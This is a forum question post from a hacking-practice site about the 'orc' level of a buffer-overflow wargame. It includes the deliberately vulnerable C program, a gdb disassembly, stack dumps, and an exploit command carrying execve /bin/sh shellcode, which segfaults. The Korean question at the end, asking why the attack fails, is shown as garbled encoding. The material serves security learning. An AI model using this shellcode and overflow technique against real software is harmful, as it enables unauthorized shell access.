|
http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1939 [º¹»ç]
/*
The Lord of the BOF : The Fellowship of the BOF
- orc
- egghunter
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
[goblin@localhost tmp]$ gdb -q orc
(gdb) disas main
Dump of assembler code for function main:
0x8048500 <main>: push %ebp
0x8048501 <main+1>: mov %esp,%ebp
0x8048503 <main+3>: sub $0x2c,%esp
0x8048506 <main+6>: cmpl $0x1,0x8(%ebp)
0x804850a <main+10>: jg 0x8048523 <main+35>
0x804850c <main+12>: push $0x8048630
0x8048511 <main+17>: call 0x8048410 <printf>
0x8048516 <main+22>: add $0x4,%esp
0x8048519 <main+25>: push $0x0
0x804851b <main+27>: call 0x8048420 <exit>
0x8048520 <main+32>: add $0x4,%esp
0x8048523 <main+35>: nop
0x8048524 <main+36>: movl $0x0,0xffffffd4(%ebp)
0x804852b <main+43>: nop
0x804852c <main+44>: lea 0x0(%esi,1),%esi
0x8048530 <main+48>: mov 0xffffffd4(%ebp),%eax
0x8048533 <main+51>: lea 0x0(,%eax,4),%edx
0x804853a <main+58>: mov 0x8049750,%eax
0x804853f <main+63>: cmpl $0x0,(%eax,%edx,1)
0x8048543 <main+67>: jne 0x8048547 <main+71>
0x8048545 <main+69>: jmp 0x8048587 <main+135>
0x8048547 <main+71>: mov 0xffffffd4(%ebp),%eax
0x804854a <main+74>: lea 0x0(,%eax,4),%edx
0x8048551 <main+81>: mov 0x8049750,%eax
0x8048556 <main+86>: mov (%eax,%edx,1),%edx
0x8048559 <main+89>: push %edx
0x804855a <main+90>: call 0x80483f0 <strlen>
0x804855f <main+95>: add $0x4,%esp
0x8048562 <main+98>: mov %eax,%eax
0x8048564 <main+100>: push %eax
0x8048565 <main+101>: push $0x0
0x8048567 <main+103>: mov 0xffffffd4(%ebp),%eax
0x804856a <main+106>: lea 0x0(,%eax,4),%edx
0x8048571 <main+113>: mov 0x8049750,%eax
0x8048576 <main+118>: mov (%eax,%edx,1),%edx
0x8048579 <main+121>: push %edx
0x804857a <main+122>: call 0x8048430 <memset>
0x804857f <main+127>: add $0xc,%esp
0x8048582 <main+130>: incl 0xffffffd4(%ebp)
0x8048585 <main+133>: jmp 0x8048530 <main+48>
0x8048587 <main+135>: mov 0xc(%ebp),%eax
0x804858a <main+138>: add $0x4,%eax
0x804858d <main+141>: mov (%eax),%edx
0x804858f <main+143>: add $0x2f,%edx
0x8048592 <main+146>: cmpb $0xbf,(%edx)
0x8048595 <main+149>: je 0x80485b0 <main+176>
0x8048597 <main+151>: push $0x804863c
0x804859c <main+156>: call 0x8048410 <printf>
0x80485a1 <main+161>: add $0x4,%esp
0x80485a4 <main+164>: push $0x0
0x80485a6 <main+166>: call 0x8048420 <exit>
0x80485ab <main+171>: add $0x4,%esp
0x80485ae <main+174>: mov %esi,%esi
---Type <return> to continue, or q <return> to quit---
0x80485b0 <main+176>: mov 0xc(%ebp),%eax
0x80485b3 <main+179>: add $0x4,%eax
0x80485b6 <main+182>: mov (%eax),%edx
0x80485b8 <main+184>: push %edx
0x80485b9 <main+185>: lea 0xffffffd8(%ebp),%eax
0x80485bc <main+188>: push %eax
0x80485bd <main+189>: call 0x8048440 <strcpy>
0x80485c2 <main+194>: add $0x8,%esp
0x80485c5 <main+197>: lea 0xffffffd8(%ebp),%eax
0x80485c8 <main+200>: push %eax
0x80485c9 <main+201>: push $0x8048659
0x80485ce <main+206>: call 0x8048410 <printf>
0x80485d3 <main+211>: add $0x8,%esp
0x80485d6 <main+214>: leave
0x80485d7 <main+215>: ret
0x80485d8 <main+216>: nop
0x80485d9 <main+217>: nop
0x80485da <main+218>: nop
0x80485db <main+219>: nop
0x80485dc <main+220>: nop
0x80485dd <main+221>: nop
0x80485de <main+222>: nop
0x80485df <main+223>: nop
End of assembler dump.
(gdb) b *main+189
Breakpoint 1 at 0x80485bd
(gdb) r `python -c 'print "A"*47+"\xbf"'`
Starting program: /home/goblin/tmp/orc `python -c 'print "A"*47+"\xbf"'`
Breakpoint 1, 0x80485bd in main ()
(gdb) x/100x $esp
0xbffffad4: 0xbffffae0 0xbffffc60 0x00000014 0xbffffb08
0xbffffae4: 0x4000a970 0x400f855b 0x08049680 0x4000ae60
0xbffffaf4: 0xbffffb54 0xbffffb08 0x080484eb 0x0804966c
0xbffffb04: 0x08049680 0xbffffb28 0x400309cb 0x00000002
0xbffffb14: 0xbffffb54 0xbffffb60 0x40013868 0x00000002
0xbffffb24: 0x08048450 0x00000000 0x08048471 0x08048500
0xbffffb34: 0x00000002 0xbffffb54 0x08048390 0x0804860c
0xbffffb44: 0x4000ae60 0xbffffb4c 0x40013e90 0x00000002
0xbffffb54: 0xbffffc4b 0xbffffc60 0x00000000 0xbffffc91
0xbffffb64: 0xbffffcb3 0xbffffcbd 0xbffffccb 0xbffffcea
0xbffffb74: 0xbffffcf9 0xbffffd12 0xbffffd2e 0xbffffd39
0xbffffb84: 0xbffffd47 0xbffffd89 0xbffffd9b 0xbffffdb0
0xbffffb94: 0xbffffdc0 0xbffffdcc 0xbffffdea 0xbffffe04
0xbffffba4: 0xbffffe0f 0xbffffe1c 0xbffffe24 0x00000000
0xbffffbb4: 0x00000003 0x08048034 0x00000004 0x00000020
0xbffffbc4: 0x00000005 0x00000006 0x00000006 0x00001000
0xbffffbd4: 0x00000007 0x40000000 0x00000008 0x00000000
0xbffffbe4: 0x00000009 0x08048450 0x0000000b 0x000001f7
0xbffffbf4: 0x0000000c 0x000001f7 0x0000000d 0x000001f7
0xbffffc04: 0x0000000e 0x000001f7 0x00000010 0x0febfbff
0xbffffc14: 0x0000000f 0xbffffc46 0x00000000 0x00000000
0xbffffc24: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc34: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc44: 0x36690000 0x2f003638 0x656d6f68 0x626f672f
0xbffffc54: 0x2f6e696c 0x2f706d74 0x0063726f 0x41414141
(gdb) x/200x $esp
0xbffffad4: 0xbffffae0 0xbffffc60 0x00000014 0xbffffb08
0xbffffae4: 0x4000a970 0x400f855b 0x08049680 0x4000ae60
0xbffffaf4: 0xbffffb54 0xbffffb08 0x080484eb 0x0804966c
0xbffffb04: 0x08049680 0xbffffb28 0x400309cb 0x00000002
0xbffffb14: 0xbffffb54 0xbffffb60 0x40013868 0x00000002
0xbffffb24: 0x08048450 0x00000000 0x08048471 0x08048500
0xbffffb34: 0x00000002 0xbffffb54 0x08048390 0x0804860c
0xbffffb44: 0x4000ae60 0xbffffb4c 0x40013e90 0x00000002
0xbffffb54: 0xbffffc4b 0xbffffc60 0x00000000 0xbffffc91
0xbffffb64: 0xbffffcb3 0xbffffcbd 0xbffffccb 0xbffffcea
0xbffffb74: 0xbffffcf9 0xbffffd12 0xbffffd2e 0xbffffd39
0xbffffb84: 0xbffffd47 0xbffffd89 0xbffffd9b 0xbffffdb0
0xbffffb94: 0xbffffdc0 0xbffffdcc 0xbffffdea 0xbffffe04
0xbffffba4: 0xbffffe0f 0xbffffe1c 0xbffffe24 0x00000000
0xbffffbb4: 0x00000003 0x08048034 0x00000004 0x00000020
0xbffffbc4: 0x00000005 0x00000006 0x00000006 0x00001000
0xbffffbd4: 0x00000007 0x40000000 0x00000008 0x00000000
0xbffffbe4: 0x00000009 0x08048450 0x0000000b 0x000001f7
0xbffffbf4: 0x0000000c 0x000001f7 0x0000000d 0x000001f7
0xbffffc04: 0x0000000e 0x000001f7 0x00000010 0x0febfbff
0xbffffc14: 0x0000000f 0xbffffc46 0x00000000 0x00000000
0xbffffc24: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc34: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc44: 0x36690000 0x2f003638 0x656d6f68 0x626f672f
0xbffffc54: 0x2f6e696c 0x2f706d74 0x0063726f 0x41414141
0xbffffc64: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc74: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc84: 0x41414141 0x41414141 0xbf414141 0x00000000
0xbffffc94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffca4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcb4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcc4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcd4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffce4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcf4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd04: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd14: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd24: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd34: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd44: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd54: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd64: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd74: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffda4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdb4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdc4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdd4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffde4: 0x00000000 0x00000000 0x00000000 0x00000000
[goblin@localhost goblin]$ bash2
[goblin@localhost goblin]$ ./orc `python -c 'print "\x90"*15+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\x90"*4+"\x64\xfc\xff\xbf"'`
1h//shh/bin⏓ኂ¡Æ
̀d
Segmentation fault
===========================================
buffer[0]¿¡¼ 48¹ÙÀÌÆ® ¶³¾îÁø °÷¿¡ "\xbf"°¡ ´ç¿¬È÷ ÀÖ±¸¿ä.
ÆäÀ̷ε带 "ÆÄÀϸí"+"\x90"*15+"½©ÄÚµå(25¹ÙÀÌÆ®)"+"\x90"*4+"buffer[5]ÀÇ ½ÃÀÛÁÖ¼Ò·Î ret¼³Á¤"
ÀÌ·¸°Ô Çߴµ¥ °ø°ÝÀÌ ¾È ¸ÔÈü´Ï´Ù.
¾îµð°¡ ¹®Á¦ÀԴϱî? |
Hit : 1938 Date : 2018/09/16 05:59
|
1574, 
3/79 
